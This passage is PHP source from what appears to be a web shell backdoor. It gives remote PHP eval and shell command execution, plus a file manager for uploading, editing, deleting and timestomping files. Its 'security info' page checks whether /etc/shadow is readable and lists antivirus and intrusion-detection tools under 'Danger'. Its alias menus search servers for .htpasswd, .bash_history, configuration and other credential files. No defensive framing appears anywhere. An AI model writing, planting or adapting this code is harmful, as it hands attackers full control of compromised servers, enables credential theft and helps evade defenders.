phpversion(),\r\n\t\t\t"VERSION" => VERSION,\r\n\t\t\t"safemode" => @ini_get(\'safe_mode\')\r\n\t\t);\r\n\t\techo serialize($a);\r\n\t} else {\r\n\t\teval($_POST[\'p1\']);\r\n\t}\r\n}\r\n//function prototype($k, $v) { $_COOKIE[$k] = $v;setcookie($k, $v);}\r\nfunction actionSecInfo() {\r\n\thardHeader();\r\n\techo \'<h1>Server security information</h1><div class=content>\';\r\n\tfunction showSecParam($n, $v) {\r\n\t\t$v = trim($v);\r\n\t\tif($v) {\r\n\t\t\techo \'<span>\' . $n . \': </span>\';\r\n\t\t\tif(strpos($v, "\\n") === false)\r\n\t\t\t\techo $v . \'<br>\';\r\n\t\t\telse\r\n\t\t\t\techo \'<pre class=ml1>\' . $v . \'</pre>\';\r\n\t\t}\r\n\t}\r\n\tshowSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n    if(function_exists(\'apache_get_modules\'))\r\n        showSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\r\n\tshowSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\r\n\tshowSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n\tshowSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n\tshowSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n\tshowSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n\t$temp=array();\r\n\tif(function_exists(\'mysql_get_client_info\'))\r\n\t\t$temp[] = "MySql (".mysql_get_client_info().")";\r\n\tif(function_exists(\'mssql_connect\'))\r\n\t\t$temp[] = "MSSQL";\r\n\tif(function_exists(\'pg_connect\'))\r\n\t\t$temp[] = "PostgreSQL";\r\n\tif(function_exists(\'oci_connect\'))\r\n\t\t$temp[] = "Oracle";\r\n\tshowSecParam(\'Supported databases\', implode(\', \', $temp));\r\n\techo \'<br>\';\r\n\tif($GLOBALS[\'os\'] == \'nix\') {\r\n            showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n            showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n            showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n            showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n            if(!$GLOBALS[\'safe_mode\']) {\r\n                $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n                $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n                $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n                echo \'<br>\';\r\n                $temp=array();\r\n                foreach ($userful as $▟)\r\n                    if(which($▟))\r\n                        $temp[] = $▟;\r\n                showSecParam(\'Userful\', implode(\', \',$temp));\r\n                $temp=array();\r\n                foreach ($danger as $▟)\r\n                    if(which($▟))\r\n                        $temp[] = $▟;\r\n                showSecParam(\'Danger\', implode(\', \',$temp));\r\n                $temp=array();\r\n                foreach ($downloaders as $▟)\r\n                    if(which($▟))\r\n                        $temp[] = $▟;\r\n                showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n                echo \'<br/>\';\r\n                showSecParam(\'HDD space\', ex(\'df -h\'));\r\n                showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n\t\t\t\tshowSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n            }\r\n\t} else {\r\n\t\tshowSecParam(\'OS Version\',ex(\'ver\'));\r\n\t\tshowSecParam(\'Account Settings\', iconv(\'CP866\', \'UTF-8\',ex(\'net accounts\')));\r\n\t\tshowSecParam(\'User Accounts\', iconv(\'CP866\', \'UTF-8\',ex(\'net user\')));\r\n\t}\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionFilesTools() {\r\n\tif( isset($_POST[\'p1\']) )\r\n\t\t$_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n\tif(@$_POST[\'p2\']==\'download\') {\r\n\t\tif(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\r\n\t\t\tob_start("ob_gzhandler", 4096);\r\n\t\t\theader("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\r\n\t\t\tif (function_exists("mime_content_type")) {\r\n\t\t\t\t$type = @mime_content_type($_POST[\'p1\']);\r\n\t\t\t\theader("Content-Type: " . $type);\r\n\t\t\t} else\r\n                header("Content-Type: application/octet-stream");\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], "r");\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile(!@feof($fp))\r\n\t\t\t\t\techo @fread($fp, 1024);\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}exit;\r\n\t}\r\n\tif( @$_POST[\'p2\'] == \'mkfile\' ) {\r\n\t\tif(!file_exists($_POST[\'p1\'])) {\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'w\');\r\n\t\t\tif($fp) {\r\n\t\t\t\t$_POST[\'p2\'] = "edit";\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\thardHeader();\r\n\techo \'<h1>File tools</h1><div class=content>\';\r\n\tif( !file_exists(@$_POST[\'p1\']) ) {\r\n\t\techo \'File not exists\';\r\n\t\thardFooter();\r\n\t\treturn;\r\n\t}\r\n\t$uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n\tif(!$uid) {\r\n\t\t$uid[\'name\'] = @fileowner($_POST[\'p1\']);\r\n\t\t$gid[\'name\'] = @filegroup($_POST[\'p1\']);\r\n\t} else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\r\n\techo \'<span>Name:</span> \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n\techo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n\tif( empty($_POST[\'p2\']) )\r\n\t\t$_POST[\'p2\'] = \'view\';\r\n\tif( is_file($_POST[\'p1\']) )\r\n\t\t$m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\', \'Frame\');\r\n\telse\r\n\t\t$m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n\tforeach($m as $v)\r\n\t\techo \'<a href=# onclick="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n\techo \'<br><br>\';\r\n\tswitch($_POST[\'p2\']) {\r\n\t\tcase \'view\':\r\n\t\t\techo \'<pre class=ml1>\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'</pre>\';\r\n\t\t\tbreak;\r\n\t\tcase \'highlight\':\r\n\t\t\tif( @is_readable($_POST[\'p1\']) ) {\r\n\t\t\t\techo \'<div class=ml1 style="background-color: #e1e1e1;color:black;">\';\r\n\t\t\t\t$oRb = @highlight_file($_POST[\'p1\'],true);\r\n\t\t\t\techo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$oRb).\'</div>\';\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase \'chmod\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$perms = 0;\r\n\t\t\t\tfor($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\r\n\t\t\t\t\t$perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n\t\t\t\tif(!@chmod($_POST[\'p1\'], $perms))\r\n\t\t\t\t\techo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";</script>\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.chmod.value);return false;"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value="submit"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'edit\':\r\n\t\t\tif( !is_writable($_POST[\'p1\'])) {\r\n\t\t\t\techo \'File isn\\\'t writeable\';\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = @filemtime($_POST[\'p1\']);\r\n\t\t\t\t$_POST[\'p3\'] = substr($_POST[\'p3\'],1);\r\n\t\t\t\t$fp = @fopen($_POST[\'p1\'],"w");\r\n\t\t\t\tif($fp) {\r\n\t\t\t\t\t@fwrite($fp,$_POST[\'p3\']);\r\n\t\t\t\t\t@fclose($fp);\r\n\t\t\t\t\techo \'Saved!<br><script>p3_="";</script>\';\r\n\t\t\t\t\t@touch($_POST[\'p1\'],$time,$time);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,\\\'1\\\'+this.text.value);return false;"><textarea name=text class=bigarea>\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'</textarea><input type=submit value="submit"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'hexdump\':\r\n\t\t\t$c = @file_get_contents($_POST[\'p1\']);\r\n\t\t\t$n = 0;\r\n\t\t\t$h = array(\'00000000<br>\',\'\',\'\');\r\n\t\t\t$len = strlen($c);\r\n\t\t\tfor ($i=0; $i<$len; ++$i) {\r\n\t\t\t\t$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n\t\t\t\tswitch ( ord($c[$i]) ) {\r\n\t\t\t\t\tcase 0:  $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 9:  $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 10: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 13: $h[2] .= \' \'; break;\r\n\t\t\t\t\tdefault: $h[2] .= $c[$i]; break;\r\n\t\t\t\t}\r\n\t\t\t\t$n++;\r\n\t\t\t\tif ($n == 32) {\r\n\t\t\t\t\t$n = 0;\r\n\t\t\t\t\tif ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}\r\n\t\t\t\t\t$h[1] .= \'<br>\';\r\n\t\t\t\t\t$h[2] .= "\\n";\r\n\t\t\t\t}\r\n\t\t \t}\r\n\t\t\techo \'<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#060a10><pre>\'.$h[1].\'</pre></td><td bgcolor=#202832><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n\t\t\tbreak;\r\n\t\tcase \'rename\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\tif(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\r\n\t\t\t\t\techo \'Can\\\'t rename!<br>\';\r\n\t\t\t\telse\r\n\t\t\t\t\tdie(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n\t\t\t}\r\n\t\t\techo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.name.value);return false;"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value="submit"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'touch\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = strtotime($_POST[\'p3\']);\r\n\t\t\t\tif($time) {\r\n\t\t\t\t\tif(!touch($_POST[\'p1\'],$time,$time))\r\n\t\t\t\t\t\techo \'Fail!\';\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\techo \'Touched!\';\r\n\t\t\t\t} else echo \'Bad time format!\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.touch.value);return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value="submit"></form>\';\r\n\t\t\tbreak;\r\n\t\t/* (С) 12.2015 mitryz */\r\n\t\tcase \'frame\':\r\n\t\t\t$frameSrc = substr(htmlspecialchars($GLOBALS[\'cwd\']), strlen(htmlspecialchars($_SERVER[\'DOCUMENT_ROOT\'])));\r\n\t\t\tif ($frameSrc[0] != \'/\')\r\n\t\t\t\t$frameSrc = \'/\' . $frameSrc;\r\n\t\t\tif ($frameSrc[strlen($frameSrc) - 1] != \'/\')\r\n\t\t\t\t$frameSrc = $frameSrc . \'/\';\r\n\t\t\t$frameSrc = $frameSrc . htmlspecialchars($_POST[\'p1\']);\r\n\t\t\techo \'<iframe width="100%" height="900px" scrolling="no" src=\'.$frameSrc.\' onload="onload=height=contentDocument.body.scrollHeight"></iframe>\';\r\n\t\t\tbreak;\r\n\t}\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nif($os == \'win\')\r\n\t$aliases = array(\r\n\t\t"List Directory" => "dir",\r\n    \t"Find index.php in current dir" => "dir /s /w /b index.php",\r\n    \t"Find *config*.php in current dir" => "dir /s /w /b *config*.php",\r\n    \t"Show active connections" => "netstat -an",\r\n    \t"Show running services" => "net start",\r\n    \t"User accounts" => "net user",\r\n    \t"Show computers" => "net view",\r\n\t\t"ARP Table" => "arp -a",\r\n\t\t"IP Configuration" => "ipconfig /all"\r\n\t);\r\nelse\r\n\t$aliases = array(\r\n  \t\t"List dir" => "ls -lha",\r\n\t\t"list file attributes on a Linux second extended file system" => "lsattr -va",\r\n  \t\t"show opened ports" => "netstat -an | grep -i listen",\r\n        "process status" => "ps aux",\r\n\t\t"Find" => "",\r\n  \t\t"find all suid files" => "find / -type f -perm -04000 -ls",\r\n  \t\t"find suid files in current dir" => "find . -type f -perm -04000 -ls",\r\n  \t\t"find all sgid files" => "find / -type f -perm -02000 -ls",\r\n  \t\t"find sgid files in current dir" => "find . -type f -perm -02000 -ls",\r\n  \t\t"find config.inc.php files" => "find / -type f -name config.inc.php",\r\n  \t\t"find config* files" => "find / -type f -name \\"config*\\"",\r\n  \t\t"find config* files in current dir" => "find . -type f -name \\"config*\\"",\r\n  \t\t"find all writable folders and files" => "find / -perm -2 -ls",\r\n  \t\t"find all writable folders and files in current dir" => "find . -perm -2 -ls",\r\n  \t\t"find all service.pwd files" => "find / -type f -name service.pwd",\r\n  \t\t"find service.pwd files in current dir" => "find . -type f -name service.pwd",\r\n  \t\t"find all .htpasswd files" => "find / -type f -name .htpasswd",\r\n  \t\t"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",\r\n  \t\t"find all .bash_history files" => "find / -type f -name .bash_history",\r\n  \t\t"find .bash_history files in current dir" => "find . -type f -name .bash_history",\r\n  \t\t"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",\r\n  \t\t"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",\r\n\t\t"Locate" => "",\r\n  \t\t"locate httpd.conf files" => "locate httpd.conf",\r\n\t\t"locate vhosts.conf files" => "locate vhosts.conf",\r\n\t\t"locate proftpd.conf files" => "locate proftpd.conf",\r\n\t\t"locate psybnc.conf files" => "locate psybnc.conf",\r\n\t\t"locate my.conf files" => "locate my.conf",\r\n\t\t"locate admin.php files" =>"locate admin.php",\r\n\t\t"locate cfg.php files" => "locate cfg.php",\r\n\t\t"locate conf.php files" => "locate conf.php",\r\n\t\t"locate config.dat files" => "locate config.dat",\r\n\t\t"locate config.php files" => "locate config.php",\r\n\t\t"locate config.inc files" => "locate config.inc",\r\n\t\t"locate config.inc.php" => "locate config.inc.php",\r\n\t\t"locate config.default.php files" => "locate config.default.php",\r\n\t\t"locate config* files " => "locate config",\r\n\t\t"locate .conf files"=>"locate \'.conf\'",\r\n\t\t"locate .pwd files" => "locate \'.pwd\'",\r\n\t\t"locate .sql files" => "locate \'.sql\'",\r\n\t\t"locate .htpasswd files" => "locate \'.htpasswd\'",\r\n\t\t"locate .bash_history files" => "locate \'.bash_history\'",\r\n\t\t"locate .mysql_history files" => "locate \'.mysql_history\'",\r\n\t\t"locate .fetchmailrc files" => "locate \'.fetchmailrc\'",\r\n\t\t"locate backup files" => "locate backup",\r\n\t\t"locate dump files" => "locate dump",\r\n\t\t"locate priv files" => "locate priv"\r\n\t);\r\nfunction actionConsole() {\r\n    if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\r\n        prototype(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);\r\n        $_POST[\'p1\'] .= \' 2>&1\';\r\n    } elseif(!empty($_POST[\'p1\']))\r\n        prototype(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n\t\tob_start();\r\n\t\techo "d.cf.cmd.value=\'\';\\n";\r\n\t\t$temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\'\\0"));\r\n\t\tif(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match))\t{\r\n\t\t\tif(@chdir($match[1])) {\r\n\t\t\t\t$GLOBALS[\'cwd\'] = @getcwd();\r\n\t\t\t\techo "c_=\'".$GLOBALS[\'cwd\']."\';";\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "d.cf.output.value+=\'".$temp."\';";\r\n\t\techo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";\r\n\t\t$temp = ob_get_clean();\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n    if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n\thardHeader();\r\n    echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array(\'\');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push(\'\');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>";\r\n\techo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\\\'clear\\\'){d.cf.output.value=\\\'\\\';d.cf.cmd.value=\\\'\\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');} return false;"><label><select name=alias>\';\r\n\tforeach($GLOBALS[\'aliases\'] as $n => $v) {\r\n\t\tif($v == \'\') {\r\n\t\t\techo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\techo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n\t}\r\n\t\r\n\techo \'</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 \'.(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX <input type=checkbox name=show_errors value=1 \'.(!empty($_POST[\'p2\'])||$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']?\'checked\':\'\').\'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\techo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n\t}\r\n\techo \'</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>\';\r\n\techo \'</form></div><script>d.cf.cmd.focus();</script>\';\r\n\thardFooter();\r\n}\r\nfunction actionPhp() {\r\n\tif( isset($_POST[\'ajax\']) ) {\r\n\t\t$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n\t\tob_start();\r\n\t\teval($_POST[\'p1\']);\r\n\t\t$temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit; \r\n\t}\r\n\thardHeader();\r\n\tif( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) {\r\n\t\techo \'<h1>PHP info</h1><div class=content>\';\r\n\t\tob_start();\r\n\t\tphpinfo();\r\n\t\t$tmp = ob_get_clean();\r\n\t\t$tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n\t\t$tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n\t\t$tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n\t\t$tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n\t\t$tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n\t\techo $tmp;\r\n\t\techo \'</div><br>\';\r\n\t}\r\n\tif(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\t$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n\t\techo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\\\'\\\');}return false;"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n\techo \' <input type=checkbox name=ajax value=1 \'.($_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\':\'\').\'margin-top:5px;" class=ml1>\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tob_start();\r\n\t\teval($_POST[\'p1\']);\r\n\t\techo htmlspecialchars(ob_get_clean());\r\n\t}\r\n\techo \'</pre></div>\';\r\n\thardFooter();\r\n}\r\nfunction actionFilesMan() {\r\n    if (!empty ($_COOKIE[\'f\']))\r\n        $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);\r\n    \r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tswitch($_POST[\'p1\']) {\r\n\t\t\tcase \'uploadFile\':\r\n\t\t\t\tif ( is_array($_FILES[\'f\'][\'tmp_name\']) ) {\r\n\t\t\t\t\tforeach ( $_FILES[\'f\'][\'tmp_name\'] as $i => $tmpName ) {\r\n                        if(!@move_uploaded_file($tmpName, $_FILES[\'f\'][\'name\'][$i])) {\r\n                                echo "Can\'t upload file!";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'mkdir\':\r\n\t\t\t\tif(!@mkdir($_POST[\'p2\']))\r\n\t\t\t\t\techo "Can\'t create new dir";\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'delete\':\r\n\t\t\t\tfunction deleteDir($path) {\r\n\t\t\t\t\t$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n\t\t\t\t\t$dh  = opendir($path);\r\n\t\t\t\t\twhile ( ($▟ = readdir($dh) ) !== false) {\r\n\t\t\t\t\t\t$▟ = $path.$▟;\r\n\t\t\t\t\t\tif ( (basename($▟) == "..") || (basename($▟) == ".") )\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t$type = filetype($▟);\r\n\t\t\t\t\t\tif ($type == "dir")\r\n\t\t\t\t\t\t\tdeleteDir($▟);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($▟);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir($dh);\r\n\t\t\t\t\t@rmdir($path);\r\n\t\t\t\t}\r\n\t\t\t\tif(is_array(@$_POST[\'f\']))\r\n\t\t\t\t\tforeach($_POST[\'f\'] as $f) {\r\n                        if($f == \'..\')\r\n                            continue;\r\n\t\t\t\t\t\t$f = urldecode($f);\r\n\t\t\t\t\t\tif(is_dir($f))\r\n\t\t\t\t\t\t\tdeleteDir($f);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($f);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'paste\':\r\n\t\t\t\tif($_COOKIE[\'act\'] == \'copy\') {\r\n\t\t\t\t\tfunction copy_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\r\n\t\t\t\t\t\tcopy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'move\') {\r\n\t\t\t\t\tfunction move_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(@is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\r\n\t\t\t\t\t\t@rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'zip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n                        $zip = new ZipArchive();\r\n                        if ($zip->open($_POST[\'p2\'], 1)) {\r\n                            chdir($_COOKIE[\'c\']);\r\n                            foreach($_COOKIE[\'f\'] as $f) {\r\n                                if($f == 